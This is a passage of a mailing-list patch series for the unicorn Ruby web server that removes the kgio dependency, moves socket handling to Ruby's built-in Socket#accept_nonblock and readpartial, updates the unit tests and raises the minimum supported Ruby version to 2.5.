           to_read -= @rbuf.size
         end
@@ -61,6 +60,8 @@ def read(length = nil, rv = '')
       read_all(rv)
     end
     rv
+  rescue EOFError
+    return eof!
   end
 
   # :call-seq:
@@ -83,9 +84,10 @@ def gets
     begin
       @rbuf.sub!(re, '') and return $1
       return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(once = '', @buf)
+      filter_body(once = '', @socket.readpartial(@@io_chunk_size, @buf))
       @rbuf << once
+    rescue EOFError
+      return eof!
     end while true
   end
 
@@ -107,14 +109,15 @@ def each
   def eof?
     if @parser.body_eof?
       while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
-        @buf << once
+        @buf << @socket.readpartial(@@io_chunk_size)
       end
       @socket = nil
       true
     else
       false
     end
+  rescue EOFError
+    return eof!
   end
 
   def filter_body(dst, src)
@@ -127,10 +130,11 @@ def read_all(dst)
     dst.replace(@rbuf)
     @socket or return
     until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
-      filter_body(@rbuf, @buf)
+      filter_body(@rbuf, @socket.readpartial(@@io_chunk_size, @buf))
       dst << @rbuf
     end
+  rescue EOFError
+    return eof!
   ensure
     @rbuf.clear
   end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..ad5814c 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -65,7 +65,7 @@ def soft_kill(sig) # :nodoc:
     end
     # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
     # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    @master.write_nonblock([signum].pack('l'), exception: false)
   rescue Errno::EPIPE
     # worker will be reaped soon
   end
@@ -73,7 +73,7 @@ def soft_kill(sig) # :nodoc:
   # this only runs when the Rack app.call is not running
   # act like a listener
   def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
+    case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
       signum = buf.unpack('l')

[-- Attachment #3: 0002-kill-off-remaining-kgio-uses.patch --]
[-- Type: text/x-diff, Size: 25476 bytes --]

From 03ec6e69fc6219a40aa8db368abe53017cd164e3 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 06:43:20 +0000
Subject: [RFC 2/3] kill off remaining kgio uses

kgio is an extra download and shared object which costs users
bandwidth, disk space, startup time and memory.  Ruby 2.3+
provides `Socket#accept_nonblock(exception: false)' support
in addition to `exception: false' support in IO#*_nonblock
methods from Ruby 2.1.

We no longer distinguish between TCPServer and UNIXServer as
separate classes internally; instead favoring the `Socket' class
of Ruby for both.  This allows us to use `Socket#accept_nonblock'
and get a populated `Addrinfo' object off accept4(2)/accept(2)
without resorting to a getpeername(2) syscall (kgio avoided
getpeername(2) in the same way).

The downside is there's more Ruby-level argument passing and
stack usage on our end with HttpRequest#read_headers (formerly
HttpRequest#read).  I chose this tradeoff since advancements in
Ruby itself can theoretically mitigate the cost of argument
passing, while syscalls are a high fixed cost given modern CPU
vulnerability mitigations.

Note: no benchmarks have been run since I don't have a suitable
system.
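The `Socket#accept_nonblock(exception: false)` behavior the message describes can be seen in a short standalone sketch (addresses here are illustrative): on a plain `Socket`, a successful accept returns a `[Socket, Addrinfo]` pair, so `REMOTE_ADDR` can be filled from the `Addrinfo` without a getpeername(2) syscall, and an empty queue yields `:wait_readable` instead of an exception:

```ruby
require 'socket'

srv = Socket.new(:INET, :STREAM)
srv.bind(Socket.pack_sockaddr_in(0, '127.0.0.1'))  # port 0: pick any free port
srv.listen(5)

# no pending connection: returns a symbol, no exception raised
p srv.accept_nonblock(exception: false)  # => :wait_readable

client = TCPSocket.new('127.0.0.1', srv.local_address.ip_port)
IO.select([srv])  # wait until the connection is accept(2)able
sock, ai = srv.accept_nonblock(exception: false)

# the Addrinfo comes straight from accept4(2)/accept(2), no getpeername(2)
p ai.ip?         # => true
p ai.ip_address  # => "127.0.0.1"
client.close; sock.close; srv.close
```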
---
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 14 +++----
 lib/unicorn/http_server.rb      | 30 +++++---------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/worker.rb           |  6 +--
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  1 -
 13 files changed, 61 insertions(+), 176 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index b817b77..564cb30 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,7 +1,6 @@
 # -*- encoding: binary -*-
 require 'etc'
 require 'stringio'
-require 'kgio'
 require 'raindrops'
 require 'io/wait'
 
@@ -112,7 +111,7 @@ def self.log_error(logger, prefix, exc)
   F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/
 
   def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
       # shrink pipes to minimize impact on /proc/sys/fs/pipe-user-pages-soft
       # limits.
       if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 8bca60a..ab3bd6e 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -61,7 +61,7 @@ def self.check_client_connection=(bool)
   # returns an environment hash suitable for Rack if successful
   # This does minimal exception trapping and it is up to the caller
   # to handle any socket errors (e.g. user aborted upload).
-  def read(socket)
+  def read_headers(socket, ai)
     e = env
 
     # From https://www.ietf.org/rfc/rfc3875:
@@ -71,7 +71,7 @@ def read(socket)
     #  identify the client for the immediate request to the server;
     #  that client may be a proxy, gateway, or other intermediary
     #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    e['REMOTE_ADDR'] = ai.unix? ? '127.0.0.1' : ai.ip_address
 
     # short circuit the common case with small GET requests first
     socket.readpartial(16384, buf)
@@ -81,7 +81,7 @@ def read(socket)
       false until add_parse(socket.readpartial(16384))
     end
 
-    check_client_connection(socket) if @@check_client_connection
+    check_client_connection(socket, ai) if @@check_client_connection
 
     e['rack.input'] = 0 == content_length ?
                       NULL_IO : @@input_class.new(socket, self)
@@ -107,8 +107,8 @@ def hijacked?
   if Raindrops.const_defined?(:TCP_Info)
     TCPI = Raindrops::TCP_Info.allocate
 
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+    def check_client_connection(socket, ai) # :nodoc:
+      if ai.ip?
         # Raindrops::TCP_Info#get!, #state (reads struct tcp_info#tcpi_state)
         raise Errno::EPIPE, "client closed connection".freeze,
               EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -152,8 +152,8 @@ def closed_state?(state) # :nodoc:
     # Ruby 2.2+ can show struct tcp_info as a string Socket::Option#inspect.
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+    def check_client_connection(socket, ai) # :nodoc:
+      if @@tcpi_inspect_ok && ai.ip?
         opt = socket.getsockopt(Socket::IPPROTO_TCP, Socket::TCP_INFO).inspect
         if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 2f1eb1b..ed5bbf1 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,9 +111,7 @@ def initialize(app, options = {})
 
     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
-      worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
-      end
+      worker_data[1] = worker_data.slice!(1..2).map { |i| IO.for_fd(i) }
       worker_data
     end
   end
@@ -243,10 +241,6 @@ def listen(address, opt = {}.merge(listener_opts[address] || {}))
     tries = opt[:tries] || 5
     begin
       io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
-        io.autoclose = false
-        io = server_cast(io)
-      end
       logger.info "listening on addr=#{sock_name(io)} fd=#{io.fileno}"
       LISTENERS << io
       io
@@ -594,9 +588,9 @@ def e100_response_write(client, env)
 
   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
-  def process_client(client)
+  def process_client(client, ai)
     @request = Unicorn::HttpRequest.new
-    env = @request.read(client)
+    env = @request.read_headers(client, ai)
 
     if early_hints
       env["rack.early_hints"] = lambda do |headers|
@@ -708,10 +702,9 @@ def worker_loop(worker)
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
       while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
-        # but that will return false
-        if client = sock.kgio_tryaccept
-          process_client(client)
+        client_ai = sock.accept_nonblock(exception: false)
+        if client_ai != :wait_readable
+          process_client(*client_ai)
           worker.tick = time_now.to_i
         end
         break if reopen
@@ -809,7 +802,6 @@ def redirect_io(io, path)
 
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
     immortal = []
 
@@ -825,8 +817,6 @@ def inherit_listeners!
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
       @immortal << io if immortal.include?(fd)
-      io.autoclose = false
-      io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
       logger.info "inherited addr=#{sock_name(io)} fd=#{io.fileno}"
       io
@@ -835,11 +825,9 @@ def inherit_listeners!
     config_listeners = config[:listeners].dup
     LISTENERS.replace(inherited)
 
-    # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
-    # objects share the same OS-level file descriptor as the higher-level
-    # *Server objects; we need to prevent Socket objects from being
-    # garbage-collected
+    # we only use generic Socket objects for aggregate Socket#accept_nonblock
+    # return value [ Socket, Addrinfo ].  This allows us to avoid having to
+    # make getpeername(2) syscalls later on to fill in env['REMOTE_ADDR']
     config_listeners -= listener_names
     if config_listeners.empty? && LISTENERS.empty?
       config_listeners << Unicorn::Const::DEFAULT_LISTEN
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 91a8e51..db9f2cb 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -65,8 +65,8 @@ def self.new(app, interval = 5, path = %r{\A/})
   end
 
   #:stopdoc:
-  def process_client(client)
-    super(client) # Unicorn::HttpServer#process_client
+  def process_client(*args)
+    super(*args) # Unicorn::HttpServer#process_client
     env = instance_variable_get(:@request).env
     if OOBGC_PATH =~ env['PATH_INFO'] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index c2ba75e..06ec2b2 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,32 +3,6 @@
 require 'socket'
 
 module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
-  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
-    require 'unicorn/write_splat'
-    UNIXClient = Class.new(Kgio::Socket) # :nodoc:
-    class UNIXSrv < Kgio::UNIXServer # :nodoc:
-      include Unicorn::WriteSplat
-      def kgio_tryaccept # :nodoc:
-        super(UNIXClient)
-      end
-    end
-    TCPClient.__send__(:include, Unicorn::WriteSplat)
-  else # Ruby 2.5+
-    UNIXSrv = Kgio::UNIXServer
-  end
-
   module SocketHelper
 
     # internal interface
@@ -105,7 +79,7 @@ def set_tcp_sockopt(sock, opt)
     def set_server_sockopt(sock, opt)
       opt = DEFAULTS.merge(opt || {})
 
-      TCPSocket === sock and set_tcp_sockopt(sock, opt)
+      set_tcp_sockopt(sock, opt) if sock.local_address.ip?
 
       rcvbuf, sndbuf = opt.values_at(:rcvbuf, :sndbuf)
       if rcvbuf || sndbuf
@@ -149,7 +123,9 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          UNIXSrv.new(address)
+          s = Socket.new(:UNIX, :STREAM)
+          s.bind(Socket.sockaddr_un(address))
+          s
         ensure
           File.umask(old_umask)
         end
@@ -177,8 +153,7 @@ def new_tcp_server(addr, port, opt)
         sock.setsockopt(:SOL_SOCKET, :SO_REUSEPORT, 1)
       end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
-      sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      sock
     end
 
     # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -194,10 +169,6 @@ def tcp_name(sock)
     def sock_name(sock)
       case sock
       when String then sock
-      when UNIXServer
-        Socket.unpack_sockaddr_un(sock.getsockname)
-      when TCPServer
-        tcp_name(sock)
       when Socket
         begin
           tcp_name(sock)
@@ -210,16 +181,5 @@ def sock_name(sock)
     end
 
     module_function :sock_name
-
-    # casts a given Socket to be a TCPServer or UNIXServer
-    def server_cast(sock)
-      begin
-        Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
-      rescue ArgumentError
-        UNIXSrv.for_fd(sock.fileno)
-      end
-    end
-
   end # module SocketHelper
 end # module Unicorn
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index ad5814c..4af31be 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -71,8 +71,8 @@ def soft_kill(sig) # :nodoc:
   end
 
   # this only runs when the Rack app.call is not running
-  # act like a listener
-  def kgio_tryaccept # :nodoc:
+  # act like Socket#accept_nonblock(exception: false)
+  def accept_nonblock(*_unused) # :nodoc:
     case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
@@ -82,7 +82,7 @@ def kgio_tryaccept # :nodoc:
     when nil # EOF: master died, but we are at a safe place to exit
       fake_sig(:QUIT)
     when :wait_readable # keep waiting
-      return false
+      return :wait_readable
     end while true # loop, as multiple signals may be sent
   end
 
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..224cb06 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..7f40601 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 7f22b24..53ae944 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -10,14 +10,9 @@
 
 class RequestTest < Test::Unit::TestCase
 
-  class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
-    end
-  end
+  MockRequest = Class.new(StringIO)
+
+  AI = Addrinfo.new(Socket.sockaddr_un('/unicorn/sucks'))
 
   def setup
     @request = HttpRequest.new
@@ -30,7 +25,7 @@ def setup
   def test_options
     client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '', env['REQUEST_PATH']
     assert_equal '', env['PATH_INFO']
     assert_equal '*', env['REQUEST_URI']
@@ -40,7 +35,7 @@ def test_options
   def test_absolute_uri_with_query
     client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'y=z', env['QUERY_STRING']
@@ -50,7 +45,7 @@ def test_absolute_uri_with_query
   def test_absolute_uri_with_fragment
     client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal '', env['QUERY_STRING']
@@ -61,7 +56,7 @@ def test_absolute_uri_with_fragment
   def test_absolute_uri_with_query_and_fragment
     client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'a=b', env['QUERY_STRING']
@@ -73,7 +68,7 @@ def test_absolute_uri_unsupported_schemes
     %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
       client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
                                "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read(client) }
+      assert_raises(HttpParserError) { @request.read_headers(client, AI) }
     end
   end
 
@@ -81,7 +76,7 @@ def test_x_forwarded_proto_https
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: https\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "https", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -90,7 +85,7 @@ def test_x_forwarded_proto_http
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: http\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -99,14 +94,14 @@ def test_x_forwarded_proto_invalid
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: ftp\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
 
   def test_rack_lint_get
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_equal '127.0.0.1', env['REMOTE_ADDR']
     assert_kind_of Array, @lint.call(env)
@@ -114,7 +109,7 @@ def test_rack_lint_get
 
   def test_no_content_stringio
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -122,7 +117,7 @@ def test_zero_content_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 0\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -130,7 +125,7 @@ def test_real_content_not_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal Unicorn::TeeInput, env['rack.input'].class
   end
 
@@ -141,7 +136,7 @@ def test_rack_lint_put
       "Content-Length: 5\r\n" \
       "\r\n" \
       "abcde")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_kind_of Array, @lint.call(env)
   end
@@ -152,14 +147,6 @@ def test_rack_lint_big_put
     buf = (' ' * bs).freeze
     length = bs * count
     client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
     client.syswrite(
       "PUT / HTTP/1.1\r\n" \
       "Host: foo\r\n" \
@@ -167,7 +154,7 @@ def client.kgio_read!(*args)
       "\r\n")
     count.times { assert_equal bs, client.syswrite(buf) }
     assert_equal 0, client.sysseek(0)
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_equal length, env['rack.input'].size
     count.times {
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index 62d5a3a..a446f06 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -24,7 +24,8 @@ def test_bind_listen_tcp
     port = unused_port @test_addr
     @tcp_listener_name = "#@test_addr:#{port}"
     @tcp_listener = bind_listen(@tcp_listener_name)
-    assert TCPServer === @tcp_listener
+    assert Socket === @tcp_listener
+    assert @tcp_listener.local_address.ip?
     assert_equal @tcp_listener_name, sock_name(@tcp_listener)
   end
 
@@ -38,10 +39,10 @@ def test_bind_listen_options
       { :backlog => 16, :rcvbuf => 4096, :sndbuf => 4096 }
     ].each do |opts|
       tcp_listener = bind_listen(tcp_listener_name, opts)
-      assert TCPServer === tcp_listener
+      assert tcp_listener.local_address.ip?
       tcp_listener.close
       unix_listener = bind_listen(unix_listener_name, opts)
-      assert UNIXServer === unix_listener
+      assert unix_listener.local_address.unix?
       unix_listener.close
     end
   end
@@ -52,11 +53,13 @@ def test_bind_listen_unix
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path)
-    assert UNIXServer === @unix_listener
+    assert Socket === @unix_listener
+    assert @unix_listener.local_address.unix?
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert File.readable?(@unix_listener_path), "not readable"
     assert File.writable?(@unix_listener_path), "not writable"
     assert_equal 0777, File.umask
+    assert_equal @unix_listener, bind_listen(@unix_listener)
   ensure
     File.umask(old_umask)
   end
@@ -67,7 +70,6 @@ def test_bind_listen_unix_umask
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path, :umask => 077)
-    assert UNIXServer === @unix_listener
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert_equal 0140700, File.stat(@unix_listener_path).mode
     assert_equal 0777, File.umask
@@ -75,28 +77,6 @@ def test_bind_listen_unix_umask
     File.umask(old_umask)
   end
 
-  def test_bind_listen_unix_idempotent
-    test_bind_listen_unix
-    a = bind_listen(@unix_listener)
-    assert_equal a.fileno, @unix_listener.fileno
-    unix_server = server_cast(@unix_listener)
-    assert UNIXServer === unix_server
-    a = bind_listen(unix_server)
-    assert_equal a.fileno, unix_server.fileno
-    assert_equal a.fileno, @unix_listener.fileno
-  end
-
-  def test_bind_listen_tcp_idempotent
-    test_bind_listen_tcp
-    a = bind_listen(@tcp_listener)
-    assert_equal a.fileno, @tcp_listener.fileno
-    tcp_server = server_cast(@tcp_listener)
-    assert TCPServer === tcp_server
-    a = bind_listen(tcp_server)
-    assert_equal a.fileno, tcp_server.fileno
-    assert_equal a.fileno, @tcp_listener.fileno
-  end
-
   def test_bind_listen_unix_rebind
     test_bind_listen_unix
     new_listener = nil
@@ -107,14 +87,18 @@ def test_bind_listen_unix_rebind
     File.unlink(@unix_listener_path)
     new_listener = bind_listen(@unix_listener_path)
 
-    assert UNIXServer === new_listener
     assert new_listener.fileno != @unix_listener.fileno
     assert_equal sock_name(new_listener), sock_name(@unix_listener)
     assert_equal @unix_listener_path, sock_name(new_listener)
     pid = fork do
-      client = server_cast(new_listener).accept
-      client.syswrite('abcde')
-      exit 0
+      begin
+        client, _ = new_listener.accept
+        client.syswrite('abcde')
+        exit 0
+      rescue => e
+        warn "#{e.message} (#{e.class})"
+        exit 1
+      end
     end
     s = unix_socket(@unix_listener_path)
     IO.select([s])
@@ -123,32 +107,6 @@ def test_bind_listen_unix_rebind
     assert status.success?
   end
 
-  def test_server_cast
-    test_bind_listen_unix
-    test_bind_listen_tcp
-    unix_listener_socket = Socket.for_fd(@unix_listener.fileno)
-    assert Socket === unix_listener_socket
-    @unix_server = server_cast(unix_listener_socket)
-    assert_equal @unix_listener.fileno, @unix_server.fileno
-    assert UNIXServer === @unix_server
-    assert_equal(@unix_server.path, @unix_listener.path,
-                 "##{@unix_server.path} != #{@unix_listener.path}")
-    assert File.socket?(@unix_server.path)
-    assert_equal @unix_listener_path, sock_name(@unix_server)
-
-    tcp_listener_socket = Socket.for_fd(@tcp_listener.fileno)
-    assert Socket === tcp_listener_socket
-    @tcp_server = server_cast(tcp_listener_socket)
-    assert_equal @tcp_listener.fileno, @tcp_server.fileno
-    assert TCPServer === @tcp_server
-    assert_equal @tcp_listener_name, sock_name(@tcp_server)
-  end
-
-  def test_sock_name
-    test_server_cast
-    sock_name(@unix_server)
-  end
-
   def test_tcp_defer_accept_default
     return unless defined?(TCP_DEFER_ACCEPT)
     port = unused_port @test_addr
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 2a14135..7986ca7 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -9,7 +9,7 @@ def setup
     @rs = "\n"
     $/ == "\n" or abort %q{test broken if \$/ != "\\n"}
     @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 6f5bc8a..607ce87 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -10,7 +10,7 @@ class TeeInput < Unicorn::TeeInput
 
 class TestTeeInput < Test::Unit::TestCase
   def setup
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
     @rs = "\n"
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
   # won't have descriptive text, only the numeric status.
   s.add_development_dependency(%q<rack>)
 
-  s.add_dependency(%q<kgio>, '~> 2.6')
   s.add_dependency(%q<raindrops>, '~> 0.7')
 
   s.add_development_dependency('test-unit', '~> 3.0')

[-- Attachment #4: 0003-update-dependency-to-Ruby-2.5.patch --]
[-- Type: text/x-diff, Size: 3257 bytes --]

From c67ebf96edc8ca691dfc556d4813fed242fe77ca Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 09:14:11 +0000
Subject: [RFC 3/3] update dependency to Ruby 2.5+

We actually need Ruby 2.3+ for `accept_nonblock(exception: false)';
and (AFAIK) we can't easily use a subclass of `Socket' while using
Socket#accept_nonblock to inject WriteSplat support for
`IO#write(*multi_args)'

So just depend on Ruby 2.5+, since all my Ruby installations are
already on the already-ancient Ruby 2.7+ anyway.
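
The `accept_nonblock(exception: false)' API mentioned above (Ruby 2.3+)
returns `:wait_readable' instead of raising IO::WaitReadable when no
connection is pending; a minimal sketch (ephemeral port, nobody connects,
so the non-exceptional path is taken):

```ruby
require 'socket'

srv = Socket.new(:INET, :STREAM)
srv.bind(Addrinfo.tcp('127.0.0.1', 0))
srv.listen(5)

case res = srv.accept_nonblock(exception: false)
when :wait_readable
  # no pending connection: no exception raised, caller may IO.select and retry
when Array
  # Socket#accept_nonblock (unlike TCPServer#accept_nonblock) returns
  # a [client_socket, addrinfo] pair
  client, addrinfo = res
  client.close
end
```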
---
 HACKING                    | 2 +-
 README                     | 2 +-
 lib/unicorn/write_splat.rb | 7 -------
 t/README                   | 2 +-
 unicorn.gemspec            | 4 ++--
 5 files changed, 5 insertions(+), 12 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

diff --git a/HACKING b/HACKING
index 020209e..5aca83e 100644
--- a/HACKING
+++ b/HACKING
@@ -60,7 +60,7 @@ becomes unavailable.
 
 === Ruby/C Compatibility
 
-We target C Ruby 2.0 and later.  We need the Ruby
+We target C Ruby 2.5 and later.  We need the Ruby
 implementation to support fork, exec, pipe, UNIX signals, access to
 integer file descriptors and ability to use unlinked files.
 
diff --git a/README b/README
index 5411003..7e29daf 100644
--- a/README
+++ b/README
@@ -12,7 +12,7 @@ both the the request and response in between unicorn and slow clients.
   cut out everything that is better supported by the operating system,
   {nginx}[https://nginx.org/] or {Rack}[https://rack.github.io/].
 
-* Compatible with Ruby 2.0.0 and later.
+* Compatible with Ruby 2.5 and later.
 
 * Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
diff --git a/lib/unicorn/write_splat.rb b/lib/unicorn/write_splat.rb
deleted file mode 100644
index 7e6e363..0000000
--- a/lib/unicorn/write_splat.rb
